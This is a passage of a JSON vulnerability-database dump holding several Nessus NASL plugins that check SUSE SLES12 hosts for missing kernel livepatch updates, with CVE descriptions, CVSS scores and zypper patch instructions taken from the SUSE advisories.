value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_89-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_89-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_89-default-2-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_89-xen-2-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:26", "description": "This update for the Linux Kernel 3.12.61-52_83 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000112: Prevent a race condition in net-packet\n code that could have been exploited by unprivileged\n users to gain root access (bsc#1052368).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-18T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2497-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_83-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_83-xen"], "id": "SUSE_SU-2017-2497-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2497-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103293);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2497-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_83 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000112: Prevent a race condition in net-packet\n code that could have been exploited by unprivileged\n users to gain root access (bsc#1052368).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172497-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a1a61a50\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1547=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_83-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_83-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_83-default-2-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_83-xen-2-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:42", "description": "This update for the Linux Kernel 3.12.61-52_92 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-15274: security/keys/keyctl.c in the Linux\n kernel did not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allowed\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call (bsc#1045327).\n\n - CVE-2017-1000112: Updated patch for this issue to be in\n sync with the other livepatches. Description of the\n issue: Prevent race condition in net-packet code that\n could have been exploited by unprivileged users to gain\n root access (bsc#1052368, bsc#1052311).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c was too late in checking whether\n an overwrite of an skb data structure may occur, which\n allowed local users to cause a denial of service (system\n crash) via crafted system calls (bsc#1042892).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem allowed remote attackers to cause a denial of\n service (system crash) via a long RPC reply\n (bsc#1046191).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-10-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2775-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-15274", "CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "modified": "2017-10-20T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_92-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_92-xen"], "id": "SUSE_SU-2017-2775-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2775-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104015);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-15274\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2775-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_92 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-15274: security/keys/keyctl.c in the Linux\n kernel did not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allowed\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call (bsc#1045327).\n\n - CVE-2017-1000112: Updated patch for this issue to be in\n sync with the other livepatches. Description of the\n issue: Prevent race condition in net-packet code that\n could have been exploited by unprivileged users to gain\n root access (bsc#1052368, bsc#1052311).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c was too late in checking whether\n an overwrite of an skb data structure may occur, which\n allowed local users to cause a denial of service (system\n crash) via crafted system calls (bsc#1042892).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem allowed remote attackers to cause a denial of\n service (system crash) via a long RPC reply\n (bsc#1046191).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15274/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172775-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6dd7bcff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1716=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_92-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_92-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_92-default-2-4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_92-xen-2-4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:24", "description": "This update for the Linux Kernel 3.12.74-60_64_54 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1038564, bsc#1042892).\n\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel\n allowed attackers to cause a denial of service (double\n free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-14T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2446-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9242", "CVE-2017-1000112", "CVE-2017-8890"], "modified": "2017-09-14T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_54-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_54-xen"], "id": "SUSE_SU-2017-2446-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103212", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2446-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103212);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-8890\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2446-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_54 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1038564, bsc#1042892).\n\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel\n allowed attackers to cause a denial of service (double\n free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-8890/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172446-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?576d9fca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1514=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1514=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_54-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_54-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", 